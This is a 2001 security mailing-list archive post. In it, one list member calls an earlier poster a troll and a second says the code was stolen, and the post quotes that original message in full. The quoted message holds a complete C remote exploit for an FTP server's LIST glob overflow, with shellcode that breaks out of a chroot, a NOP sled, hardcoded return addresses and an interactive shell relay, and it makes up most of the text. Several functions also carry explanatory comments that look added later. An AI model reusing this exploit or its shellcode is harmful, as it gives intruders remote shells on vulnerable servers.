Troll (was: RE: Another sploit makes 2 in one day)

From: Russ Spooner (labratat_private)
Date: Thu Jun 07 2001 - 02:34:57 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    Um, haven't you guys ever been trolled before?
    
    The worst thing you can do is reply to a luser like that...
    
    I know a few sites will start archiving the "exploit" and giving him
    credit for someone else's code, but other than notifying the gullible it
    is probably best to ignore him and get SF to stop authorising his
    posts.
    
    Otherwise these lists will get as bad as /.
    
    BTW I don't want to perpetuate this, though... so mail me in private
    rather than to the list with flames...
    
    Russ
    
    - -----------------------------------------+
    Russ Spooner     (Mobile : 07771 544971) |
    Interrorem: Network Security Specialists |
    Software vulnerability testing & defence |
    Protecting business : www.interrorem.com |
    
    
    > -----Original Message-----
    > From: Brad Doctor [mailto:bdoctor@ps-ax.com]
    > Sent: 07 June 2001 05:01
    > To: Fsck Theo Deraadt
    > Cc: miscat_private; vuln-devat_private;
    > bugtraqat_private; submissionsat_private;
    > securityat_private; theoat_private
    > Subject: Re: Another sploit makes 2 in one day
    > 
    > 
    > I have no problem at all with this sort of thing, but it bothers me
    > when  people steal code and call it their own.  That is just
    > pathetic.
    > 
    > http://www.securityfocus.com/templates/archive.pike?list=1&mid=17692
    > 2  
    > 
    > -brad
    > 
    > 
    > 
    > At 12:47 PM 6/6/2001 -0700, Fsck Theo Deraadt wrote:
    > >So openbsd'ers complained to my mail provider because
    > >they dont like when people show them up with code to
    > >prove they lie about things and try to hush up
    > >everyone. Its okay though no bad feelings so here it
    > >is in your face pizda.c
    > >
    > >//
    > >// Pizda.c
    > >// Hello all I have to now post this because I keep it
    > >low key
    > >// for long for my love of Openbsd but after Theo lied
    > >to all
    > >// I decided to release this to the public domain to
    > >show what
    > >// all claim no one could do which is prove them wrong
    > >so here
    > >// it go for all to see how fast they try to fix
    > >before some
    > >// people see how much problems this things cause.
    > >// copyraadt 2001 by Jigglypuff of HackMasterZ
    > >// Theo: kurite moju trubku
    > >//
    > >
    > >
    > >
    > >#include <sys/types.h>
    > >#include <sys/socket.h>
    > >#include <netinet/in.h>
    > >#include <netdb.h>
    > >#include <stdio.h>
    > >#include <unistd.h>
    > >#include <stdlib.h>
    > >#include <string.h>
    > >
    > >extern char *optarg;
    > >static int debug;
    > >int cflag, lflag, sflag;
    > >
    > >char shellcode[] =
    > >"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
    > >"\x58\x50\x66\x68\x2e\x2e\x89\xe1"
    > >"\x50\x51\x50\xb0\x05\xcd\x80\x89"
    > >"\xc3\x58\x50\x68\x61\x64\x66\x61"
    > >"\x89\xe2\x66\x68\x6d\x01\x52\x50"
    > >"\xb0\x88\xcd\x80\xb0\x3d\xcd\x80"
    > >"\x53\x50\xb0\x01\x83\xc0\x0c\xcd"
    > >"\x80\x51\x50\x31\xc9\xb1\x64\xb0"
    > >"\x0c\xcd\x80\xe2\xfa\xb0\x3d\xcd"
    > >"\x80\x31\xc0\x50\x68\x2f\x2f\x73"
    > >"\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    > >"\x50\x53\x50\x54\x53\xb0\x3b\x50"
    > >"\xcd\x80\xc3";
    > >
    > >#define THEO "THEO ftp\r\n"
    > >#define SUXX "SUXX -user@\r\n"
    > >
    > >void usage(const char *);
    > >void docmd(int s, const char *cmd, int print);
    > >void communicate(int s);
    > >
    > >int main(int argc, char *argv[])
    > >{
    > >   char expbuf[512] = "LIST ", *basedir, option;
    > >   char commandbuf[512] = "", *hostname;
    > >   int cnt, dirlen, explen, sendlen;
    > >   int s, port = 21, pad;
    > >   long retaddr;
    > >   struct sockaddr_in sin;
    > >   struct hostent *he;
    > >
    > >   while((option = getopt(argc, argv, "dc:l:p:s:")) !=
    > >-1)
    > >     switch(option)
    > >       {
    > >       case 'd':
    > >         debug++;
    > >         break;
    > >       case 'c':
    > >         cflag = 1;
    > >         basedir = optarg;
    > >         break;
    > >       case 'l':
    > >         lflag = 1;
    > >         dirlen = atoi(optarg);
    > >         if(dirlen < 16)
    > >           {
    > >             usage(argv[0]);
    > >             exit(0);
    > >           }
    > >         break;
    > >       case 'p':
    > >         port = atoi(optarg);
    > >         break;
    > >       case 's':
    > >         sflag = 1;
    > >         retaddr = strtoul(optarg, 0, 0);
    > >         break;
    > >       default:
    > >         usage(argv[0]);
    > >         exit(0);
    > >       }
    > >
    > >   if(!cflag || !lflag)
    > >     {
    > >       usage(argv[0]);
    > >       exit(0);
    > >     }
    > >
    > >   if(argc - optind == 1)
    > >     hostname = argv[optind];
    > >   else
    > >     {
    > >       usage(argv[0]);
    > >       exit(0);
    > >     }
    > >
    > >   if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    > >     {
    > >       perror("socket");
    > >       exit(1);
    > >     }
    > >
    > >   if((he = gethostbyname(hostname)) == NULL)
    > >     {
    > >       herror(hostname);
    > >       exit(0);
    > >     }
    > >   memset(&sin, 0, sizeof(struct sockaddr_in));
    > >   sin.sin_family = AF_INET;
    > >   sin.sin_port = htons(port);
    > >   memcpy(&sin.sin_addr, he->h_addr_list[0],
    > >sizeof(struct in_addr));
    > >   if(connect(s, (struct sockaddr *) &sin,
    > >sizeof(struct sockaddr_in)) == -1)
    > >     {
    > >       perror("connect");
    > >       exit(0);
    > >     }
    > >
    > >   if(debug)
    > >     fprintf(stderr, "// basedir = \"%s\"\n", basedir);
    > >
    > >   for(cnt = 0; cnt < 1024/(dirlen+4)-1; cnt++)
    > >     strcat(expbuf, "*/../");
    > >   strcat(expbuf, "*/");
    > >   if(debug)
    > >     fprintf(stderr, "// expbuf = \"%s\"\n", expbuf);
    > >
    > >   explen = cnt*(dirlen+4) + dirlen + 1;
    > >   if(debug)
    > >     fprintf(stderr, "// explen = %d\n", explen);
    > >
    > >   sendlen = strlen(expbuf);
    > >   if(debug)
    > >     fprintf(stderr, "// sendlen = %d\n", sendlen);
    > >
    > >   docmd(s, "", 0);
    > >
    > >   docmd(s, THEO, 0);
    > >   docmd(s, SUXX, 1);
    > >
    > >   snprintf(commandbuf, sizeof(commandbuf), "CWD
    > >%s\r\n", basedir);
    > >   docmd(s, commandbuf, 1);
    > >
    > >   pad = 1027 - explen;
    > >   if(debug)
    > >     fprintf(stderr, "// pad = %d\n", pad);
    > >
    > >   for(; pad >= 0; pad--)
    > >     strcat(expbuf, "x");
    > >
    > >   if(!sflag)
    > >     {
    > >       switch(dirlen)
    > >         {
    > >         case 16:
    > >           retaddr = 0xdfbeab60;
    > >         case 26:
    > >           retaddr = 0xdfbefe40;
    > >         default:
    > >           retaddr = 0xdfbeba20 + (dirlen-17)*0x9c0;
    > >         }
    > >       retaddr+=20;
    > >     }
    > >
    > >   fprintf(stderr, "retaddr = %.8lx\n", retaddr);
    > >   strncat(expbuf, (char *) &retaddr, 4);
    > >
    > >   for(cnt = strlen(expbuf); cnt <
    > >508-strlen(shellcode); cnt++)
    > >     strcat(expbuf, "\x90");
    > >
    > >   strcat(expbuf, shellcode);
    > >
    > >   strcat(expbuf, "\r\n");
    > >
    > >   fprintf(stderr, "Press EnTeR.."); fflush(stderr);
    > >   fgets(commandbuf, sizeof(commandbuf)-1, stdin);
    > >
    > >   docmd(s, expbuf, 0);
    > >
    > >   fprintf(stderr, "remember Theo is a liar
    > >\"adfa\"-dir\n");
    > >   communicate(s);
    > >
    > >   return 0;
    > >}
    > >
    > >// Print the command-line synopsis to stderr; s is the program name (argv[0]).
    > >void usage(const char *s)
    > >{
    > >   fprintf(stderr, "Usage %s [-s retaddr] [-d] -c dir
    > >-l dirlen(>=16) [-p port] hostname\n", s);
    > >}
    > >
    > >// Send one command string on socket s and wait briefly for a reply.
    > >//   s     - connected socket
    > >//   cmd   - NUL-terminated command, sent verbatim (no terminator is added)
    > >//   print - non-zero: echo the reply to stderr even when debug is off
    > >// Exits the process (status 0) on a short send, a recv error or EOF;
    > >// a reply that does not arrive within one second is silently skipped.
    > >void docmd(int s, const char *cmd, int print)
    > >{
    > >   char uglybuf[1024];
    > >   int len;
    > >   fd_set rfds;
    > >   struct timeval tv;
    > >
    > >   len = strlen(cmd);
    > >   if(debug)
    > >     {
    > >       // Debug trace of outgoing data: a "\\ " prefix, then the raw command.
    > >       write(STDERR_FILENO, "\\\\ ", 3);
    > >       write(STDERR_FILENO, cmd, len);
    > >     }
    > >   // A partial send is treated the same as a failure; nothing is retried.
    > >   if(send(s, cmd, len, 0) != len)
    > >     {
    > >       perror("send");
    > >       exit(0);
    > >     }
    > >
    > >   // Wait at most one second for the reply. select()'s return value is
    > >   // not checked, so on a select error rfds is left as set above and the
    > >   // recv below may block indefinitely.
    > >   FD_ZERO(&rfds);
    > >   FD_SET(s, &rfds);
    > >   tv.tv_sec = 1;
    > >   tv.tv_usec = 0;
    > >   select(s+1, &rfds, NULL, NULL, &tv);
    > >   if(FD_ISSET(s, &rfds))
    > >     {
    > >       // Reads a single chunk only; anything beyond sizeof(uglybuf) stays
    > >       // queued on the socket for the next call.
    > >       if((len = recv(s, uglybuf, sizeof(uglybuf), 0))
    > >< 0)
    > >         {
    > >           perror("recv");
    > >           exit(0);
    > >         }
    > >       if(len == 0)
    > >         {
    > >           fprintf(stderr, "EOF on socket. Sorry.\n");
    > >           exit(0);
    > >         }
    > >       if(debug || print)
    > >         {
    > >           // uglybuf is not NUL-terminated; only the len bytes received are written.
    > >           write(STDERR_FILENO, "// ", 3);
    > >           write(STDERR_FILENO, uglybuf, len);
    > >         }
    > >     }
    > >}
    > >
    > >// Interactive relay: copy stdin to socket s and socket data to stdout
    > >// until either side closes or an I/O call fails.
    > >//   s - connected socket
    > >// Returns when read()/recv() report EOF or error, or when send()/write()
    > >// fail outright. Partial sends/writes are not completed (see below).
    > >void communicate(int s)
    > >{
    > >   char buf[1024];
    > >   int len;
    > >   fd_set rfds;
    > >
    > >   while(1)
    > >     {
    > >       // The set is rebuilt every iteration because select() modifies it in place.
    > >       FD_ZERO(&rfds);
    > >       FD_SET(STDIN_FILENO, &rfds);
    > >       FD_SET(s, &rfds);
    > >       // NULL timeout: blocks until one of the two descriptors is readable.
    > >       // nfds = s+1 assumes s is the highest descriptor, which holds unless
    > >       // stdin was closed before the socket was created. The return value
    > >       // is not checked, so a select error leaves rfds as set above.
    > >       select(s+1, &rfds, NULL, NULL, NULL);
    > >       if(FD_ISSET(STDIN_FILENO, &rfds))
    > >         {
    > >           if((len = read(STDIN_FILENO, buf,
    > >sizeof(buf))) <= 0)
    > >             return;
    > >           // Only an outright send failure ends the loop; a short send drops data.
    > >           if(send(s, buf, len, 0) == -1)
    > >             return;
    > >         }
    > >       if(FD_ISSET(s, &rfds))
    > >         {
    > >           if((len = recv(s, buf, sizeof(buf), 0)) <=
    > >0)
    > >             return;
    > >           // Likewise, a partial write to stdout is not resumed.
    > >           if(write(STDOUT_FILENO, buf, len) == -1)
    > >             return;
    > >         }
    > >     }
    > >}
    > >
    > >
    > >
    > >
    > >__________________________________________________
    > >Do You Yahoo!?
    > >Get personalized email addresses from Yahoo! Mail - only $35
    > >a year!  http://personal.mail.yahoo.com/
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
    
    iQA/AwUBOx9KwVKMcg0VZCu/EQIlbACgjLXOLn4VXMWzLVlubwTzw84mkhQAoOLk
    PifgvvoXTU27uKzrZ4eBrPC5
    =THgO
    -----END PGP SIGNATURE-----
    


